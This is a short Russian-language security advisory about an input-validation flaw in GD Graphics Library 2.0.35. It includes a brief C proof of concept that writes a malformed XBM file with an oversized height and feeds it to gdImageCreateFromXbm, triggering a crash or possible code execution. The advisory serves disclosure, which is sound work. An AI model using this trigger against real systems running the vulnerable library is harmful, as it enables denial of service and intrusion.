Программа: GD Graphics library 2.0.35
Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку или выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в функции gdImageCreateTrueColor(). Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании или выполнению произвольного кода.
Пример:
#include "gd.h"
int main() {
FILE *fp = fopen("./x.xbm", "w+");
fprintf(fp, "#define width 255\n#define height 1073741824\nstatic unsigned char bla = {\n");
fseek(fp, 0, SEEK_SET);
gdImageCreateFromXbm(fp);
}
